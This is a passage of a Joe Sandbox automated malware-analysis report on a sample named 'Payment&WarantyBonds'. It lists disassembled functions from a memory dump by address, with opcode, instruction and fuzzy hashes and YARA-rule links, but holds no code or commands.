                                                                                                                                                                                • Opcode ID: 71633378730a8143fa800f85cc137b178f1c4070c4924e23c8dba9615e08d9d2
                                                                                                                                                                                • Instruction ID: 512930c3f0e0b04d9180e792a45e076a8987d24cba22fb5a4e572f9c5eb9c7bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 71633378730a8143fa800f85cc137b178f1c4070c4924e23c8dba9615e08d9d2
                                                                                                                                                                                • Instruction Fuzzy Hash: E1014932305689AFE32BA66DDC84F277B8DEF90395F050075F900EB251DA58DE00C2B2
                                                                                                                                                                                Function 01804690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5a141bb9ffaff96f2729c142624be58d5020222a710040e4518909d8144653c6
                                                                                                                                                                                • Instruction ID: 0f401c91a13d445b6e7df06c48e51adb50f83569ab0df6db82333348136e7257
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a141bb9ffaff96f2729c142624be58d5020222a710040e4518909d8144653c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 57119E7628064DAFDB668F5DDD40B567BA8EB86B64F004219FA05CB691C370EA00CF60
                                                                                                                                                                                Function 018D4B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e526ddbbc9e7fd2fe8792e9ec023c47ad5d059a1d1a056ea85e97e3702efd955
                                                                                                                                                                                • Instruction ID: 2220e993faa9083994c88848a5825de25b555b7bd0299d8bdaf5bc87d5ffea52
                                                                                                                                                                                • Opcode Fuzzy Hash: e526ddbbc9e7fd2fe8792e9ec023c47ad5d059a1d1a056ea85e97e3702efd955
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D1129322007119FD722DBADD840F27B7A6FFD4320F144429EA86C7A50DA30EA02CB90
                                                                                                                                                                                Function 01836620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 51eb7f855f2ce3614150a4357687a2a45c308552a6f6405cc51d592fcef90339
                                                                                                                                                                                • Instruction ID: c07507ad2f922baccfad7795b872c1f2a581b1fc23e59b978600c887353e60f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 51eb7f855f2ce3614150a4357687a2a45c308552a6f6405cc51d592fcef90339
                                                                                                                                                                                • Instruction Fuzzy Hash: C4117072A00615ABDB229B5DC980B5EFBB8EF84790F690459DA01E7244F730AB059BA1
                                                                                                                                                                                Function 0182EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: df2c1d07ee078f30b89a6a2bc46d195f7bcf6327d181a8a1ad50c6f8195122e3
                                                                                                                                                                                • Instruction ID: a88c0b1f67f1d17f9b4a9d779977dc73264b5b36f984fb00542a82a883158d96
                                                                                                                                                                                • Opcode Fuzzy Hash: df2c1d07ee078f30b89a6a2bc46d195f7bcf6327d181a8a1ad50c6f8195122e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 53019E715011099FC726DB19E448F16BBF9EB95314F21816EE206CB6A4CB70AE86CF94
                                                                                                                                                                                Function 0182E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                • Instruction ID: d1fe456e000569de773af55c365dca3442b0f98ed8fe05f6c7ca29bdf0d51f47
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                • Instruction Fuzzy Hash: 0411E5722126D69BE723972CEA64B257B9CAF0075CF1900A0EF45D7642F728CA82C255
                                                                                                                                                                                Function 0188E75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                • Instruction ID: 9a8a345abe7e3bee9b842ac2cb83206f59ea5922a23cdf968eac5438b91a17dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                • Instruction Fuzzy Hash: 33019236600109AFE721BF5CCC40F5A7AA9EB95B54F058424EA05DB261E771DF40C790
                                                                                                                                                                                Function 017FA250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                • Instruction ID: f38a5a73cbab96c1f9040f419f1b800108ddbbd967dc762aec89b3412697e4a0
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                • Instruction Fuzzy Hash: F7012636608B219BCB318F19E840A33BBA8EF95B70700852DFE99CB381C731D400CBA0
                                                                                                                                                                                Function 018D4940 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fc66967bb1c2f7b7148ccb14f24e8c7199678302435ea301296b793032e4f1fc
                                                                                                                                                                                • Instruction ID: 103eb22be4aa6ceb108b2bd6147d1c1c615860d15f4d4a738aaaccae8b258f4a
                                                                                                                                                                                • Opcode Fuzzy Hash: fc66967bb1c2f7b7148ccb14f24e8c7199678302435ea301296b793032e4f1fc
                                                                                                                                                                                • Instruction Fuzzy Hash: C2012233541301AFC332DF1EC840E12B7A8EB81370B254225E9A8DB5BAE730EA01CBC0
                                                                                                                                                                                Function 0187E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 50cdf3ca0990f19002b564dc782a91968c55a9af944d1bcc9a6c3b1e8570c393
                                                                                                                                                                                • Instruction ID: f51703e78b66852d99852aaad0596137d446e9ab64d1730daa28d69133a91f19
                                                                                                                                                                                • Opcode Fuzzy Hash: 50cdf3ca0990f19002b564dc782a91968c55a9af944d1bcc9a6c3b1e8570c393
                                                                                                                                                                                • Instruction Fuzzy Hash: 9911A132241245EFDB26EF19CD80F167BB8FF54B54F2000A9FA05DB691D635EE01CA90
                                                                                                                                                                                Function 01806259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19623b15249887d8d07f27dda0a7f072c5f3d8fb5987ae2c81036832e6f84c39
                                                                                                                                                                                • Instruction ID: 28cd02acb2dfb6e1fdf5a8651c948414dd11269a99fc88f09e8160ff38cbdf3d
                                                                                                                                                                                • Opcode Fuzzy Hash: 19623b15249887d8d07f27dda0a7f072c5f3d8fb5987ae2c81036832e6f84c39
                                                                                                                                                                                • Instruction Fuzzy Hash: CE115E7154522DABEB65EB68CC41FE9B375AF04710F504194B314E60E1DB709F91CF85
                                                                                                                                                                                Function 0180208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                • Instruction ID: edf7cb7681aa361362e19c3de68b4cd9a20729ba72984c7e3b49936273947525
                                                                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F0128322002148BEF52CA1DDC84B52776BFFC4714F5545A5ED45CF286DAB1CE81C390
                                                                                                                                                                                Function 01886050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                                                                                • Instruction ID: eab0227004a211ba0b4aa8fa08b16bc968c78274be75df7870dcd1188936d31e
                                                                                                                                                                                • Opcode Fuzzy Hash: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4011177790011DABCB12EB98CC80DDFBB7CEF48358F044166A906E7211EA34AB15CBE1
                                                                                                                                                                                Function 01896500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                                                                                • Instruction ID: 174b8504d3d83ed8c66038be4bfc5cc994fa7ab67b18e7fc8d575cd77c87adb4
                                                                                                                                                                                • Opcode Fuzzy Hash: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                                                                                • Instruction Fuzzy Hash: 2811A1766441469FDB11CF58D800BA6BBB9FB9A314F1D8159F848CB315E732ED81CBA0
                                                                                                                                                                                Function 0188C810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                                                                                • Instruction ID: 1199cff6d8107ec94190484e24b15b2429232379fa2b104641b4f61082c6e782
                                                                                                                                                                                • Opcode Fuzzy Hash: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A1118B1A0020D9FCB00DFA9D541AAEBBF8FF58350F10406AA905E7355D674EA018BA4
                                                                                                                                                                                Function 017FC020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                • Instruction ID: bdd6cf08b8f8465f83ab0363c46927b8bd514e4c69ebc21ed80cc3589dde3aea
                                                                                                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D01B5321007099FEB2396ADC800EA7B7E9FFC5314F04495DAE46CB650DA74E642C751
                                                                                                                                                                                Function 018420F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0880908625daf242fc33eaa8827c34e85fa6a063b1f033d5c5c87422fb8fcabd
                                                                                                                                                                                • Instruction ID: ec3bf9d7bc1bab835b991f434b90b74cd3e99cbd0a0938df014337ca66b9ddef
                                                                                                                                                                                • Opcode Fuzzy Hash: 0880908625daf242fc33eaa8827c34e85fa6a063b1f033d5c5c87422fb8fcabd
                                                                                                                                                                                • Instruction Fuzzy Hash: DB116D35A0120DEBDB05EFA8D850FAE7BB6EB44344F104059F906D7250DA35EF11CB91
                                                                                                                                                                                Function 0183E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e75990d78a4cb036cdd1dd1d680815a9630ea64b1bf50b668c268221c3ae3bd1
                                                                                                                                                                                • Instruction ID: 45e64075375a6dfb3558126facdf6e7a5b66be0dae5fc66242a1e5310033b402
                                                                                                                                                                                • Opcode Fuzzy Hash: e75990d78a4cb036cdd1dd1d680815a9630ea64b1bf50b668c268221c3ae3bd1
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E01DF72610A02BBC311BB2DCD80E53BBADFB947A4B000629F605C3650EB24EE01C6E1
                                                                                                                                                                                Function 018969C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2bf09f1de6902e566e4e568cdb70679f26fa52a2c35c5356c02c8d454f27508e
                                                                                                                                                                                • Instruction ID: a4b2817b5af2c9582a0d673208b1ca45411785c524fb5968b48528c1702df133
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bf09f1de6902e566e4e568cdb70679f26fa52a2c35c5356c02c8d454f27508e
                                                                                                                                                                                • Instruction Fuzzy Hash: E201FC322142169BC720DF6EC848D67BBE8FF54764F654129ED59C7180F7349A01C7D1
                                                                                                                                                                                Function 0188C460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd275c3eb20093ae5eccdfb78ca7c39998e1fb6bb9e8d04624567989b58739a2
                                                                                                                                                                                • Instruction ID: 6fa0d51e4328b501fbc8e19b1ad8c40f0ad255d82a045b28681fa0a00a5bdf1a
                                                                                                                                                                                • Opcode Fuzzy Hash: bd275c3eb20093ae5eccdfb78ca7c39998e1fb6bb9e8d04624567989b58739a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C115B71A0120DABDB15EFA8C880EEE7BB5EB48354F104099BD01D7344DB34EA51CBA1
                                                                                                                                                                                Function 0188C97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: beeeaa9ce26e05ed4db198cbf759fbd4d7a466768c55de02d47ee1f15f0db72e
                                                                                                                                                                                • Instruction ID: 9e2f162c242b6fbfcb9762b3912b9d319d5bd4b889b59cf9c039e3bda87ff84d
                                                                                                                                                                                • Opcode Fuzzy Hash: beeeaa9ce26e05ed4db198cbf759fbd4d7a466768c55de02d47ee1f15f0db72e
                                                                                                                                                                                • Instruction Fuzzy Hash: CB1139B16183099FC700DF6DD841A9BBBE8EF98710F00455EB998D7395E670EA10CBA6
                                                                                                                                                                                Function 018D4A80 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                • Instruction ID: 28f4b68403491788d09d350625ffd7d47c52f9273ba5c29b227d1f64bf94921f
                                                                                                                                                                                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                • Instruction Fuzzy Hash: 3701D4322007069FD7219A6DD844F96BBEAFBC5310F044859F642CBA90EAB0F980C795
                                                                                                                                                                                Function 0188CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 58719d3729c84cac42b3ea03e31e5d43fa2f8b6c639c45e52f28a6a4a4616bd2
                                                                                                                                                                                • Instruction ID: 4b3e85b76ad1113b76cd670397bd8ef729cb62557c610b14adeb05c3fbe4ca58
                                                                                                                                                                                • Opcode Fuzzy Hash: 58719d3729c84cac42b3ea03e31e5d43fa2f8b6c639c45e52f28a6a4a4616bd2
                                                                                                                                                                                • Instruction Fuzzy Hash: B3113CB16183099FC710DF6DD44195BBBE4FF99750F00451EB998D7354E630EA00CBA6
                                                                                                                                                                                Function 0181E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                • Instruction ID: c619072081ee11728d48b05bd567d1a6e66f6184d711be8181722a9de57c5158
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                • Instruction Fuzzy Hash: 92017C32600584DFE323D71DC948F667BDCFB44B58F0914A1FD05CBA92D628DE40C621
                                                                                                                                                                                Function 017F826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e46e43cb741b8d5461c4d106a0835d675f9554c7ab63152596f809cf4a92f689
                                                                                                                                                                                • Instruction ID: 3d91be4de126070aae9da68630384c242e485051549e5a86ef93a854b5d1a55a
                                                                                                                                                                                • Opcode Fuzzy Hash: e46e43cb741b8d5461c4d106a0835d675f9554c7ab63152596f809cf4a92f689
                                                                                                                                                                                • Instruction Fuzzy Hash: D0018F356045099FDB14EB6DDC089AFB7B9EF85220B15406D9A01EB784EE30EE02C792
                                                                                                                                                                                Function 018AEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 45ad6ddb174cafcde522b69ff28203aec7e7e977a8d98c811b862a5338e6eebe
                                                                                                                                                                                • Instruction ID: 6128a958dc46be00de3c39a746065db11db514d925870b92c137852c42630025
                                                                                                                                                                                • Opcode Fuzzy Hash: 45ad6ddb174cafcde522b69ff28203aec7e7e977a8d98c811b862a5338e6eebe
                                                                                                                                                                                • Instruction Fuzzy Hash: 8001A7712407059FE3315F1AD840F02BAA9EF55B50F11482EB705DF390D6B1AA41CB95
                                                                                                                                                                                Function 01802582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c99d181df4557257e9194fc6b3d7cf57349dbff164e0ad135ba6c06daa694fb6
                                                                                                                                                                                • Instruction ID: bcb07dce67019c7b3b29653bd4499d7202f2821bb1515919fc82d6a2b2b7214a
                                                                                                                                                                                • Opcode Fuzzy Hash: c99d181df4557257e9194fc6b3d7cf57349dbff164e0ad135ba6c06daa694fb6
